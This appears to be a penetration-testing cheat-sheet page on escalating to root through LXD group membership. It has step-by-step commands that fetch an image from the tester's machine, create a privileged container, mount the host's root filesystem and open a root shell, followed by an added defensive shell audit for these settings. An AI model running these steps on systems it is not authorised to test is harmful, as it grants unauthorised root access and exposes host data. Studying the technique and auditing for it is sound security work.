
LXC/LXD (Linux Container/Daemon) Privilege Escalation

LXD is a container management extension for Linux Containers (LXC).


Last updated 1 year ago

  1. Check if You are in the Lxd Group

    If you belong to the lxd group, you may be able to gain root privileges.

    groups
    id
  2. Check if Container Image Exists

    List all images and check if a container image already exists.

    lxc image list

    If no container image exists, build a new image on your local machine.

    git clone https://github.com/saghul/lxd-alpine-builder.git
    cd lxd-alpine-builder
    sudo ./build-alpine
    python3 -m http.server 8000

    On the remote machine, download the “alpine-*.tar.gz” file and import it.

    wget http://<local-ip>:8000/alpine-v3.17-x86_64-20221206_0615.tar.gz
    lxc image import ./alpine-v3.17-x86_64-20221206_0615.tar.gz --alias testimage
    lxc image list

    After that, create a new container from the image.

    lxc init testimage testcontainer -c security.privileged=true

    If you get the error “No storage pool found. Please create a new storage pool.”, initialize LXD first.

    lxd init
    # Set default values in prompt

    Then create the new container with the command above.

  3. Mount the Host's Root Directory into the New Container

    Now mount the host's / directory onto /mnt/root in the container you created.

    lxc config device add testcontainer testdevice disk source=/ path=/mnt/root recursive=true
  4. Start the Container

    lxc start testcontainer
  5. Get a Shell

    lxc exec testcontainer /bin/sh

    Check if you are root.

    whoami
  6. Retrieve the Sensitive Information in the Mounted Directory

    cd /mnt/root/
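
To audit a host for the configuration this procedure relies on, the following added example (not part of the original page) parses `getent group lxd`-style and `lxc config show`-style output and reports lxd group members, privileged containers, and disk devices whose source is the host's `/`. The function names and the sample inputs are constructed for illustration.

```shell
# Added defensive example (not from the original page): flag the LXD settings
# that the steps above depend on. Sample inputs below are constructed.

# Print members of the lxd group from a `getent group lxd`-style line on stdin.
lxd_group_members() {
    awk -F: '$1 == "lxd" && $4 != "" { gsub(",", "\n", $4); print $4 }'
}

# Read `lxc config show <container>` YAML on stdin; print one finding per line.
# Exit status is 1 when at least one finding is printed, 0 otherwise.
audit_container_config() {
    awk '
        function strip(s) { gsub(/^[ "]+|[ "]+$/, "", s); return s }
        function emit_dev() {
            if (dev != "" && type == "disk" && src == "/")
                { print "host-root-disk:" dev; found = 1 }
            dev = ""; type = ""; src = ""
        }
        /^[^ ]/ { emit_dev(); section = $1 }      # top-level key such as "devices:"
        section == "config:" && $1 == "security.privileged:" {
            if (strip($2) == "true") { print "privileged-container"; found = 1 }
        }
        section == "devices:" && /^  [^ ]/ { emit_dev(); dev = $1; sub(/:$/, "", dev) }
        section == "devices:" && /^    [^ ]/ {
            if ($1 == "type:")   type = strip($2)
            if ($1 == "source:") src  = strip($2)
        }
        END { emit_dev(); exit found + 0 }
    '
}

# Constructed sample inputs (hypothetical users and container settings).
SAMPLE_GROUP='lxd:x:116:alice,svc-deploy'
SAMPLE_CONFIG='architecture: x86_64
config:
  security.privileged: "true"
devices:
  testdevice:
    path: /mnt/root
    recursive: "true"
    source: /
    type: disk
ephemeral: false'

printf '%s\n' "$SAMPLE_GROUP" | lxd_group_members
printf '%s\n' "$SAMPLE_CONFIG" | audit_container_config || echo "risky configuration found"
```

On a live host, pipe `getent group lxd` and `lxc config show <container> --expanded` into the two functions; `--expanded` also includes devices inherited from profiles.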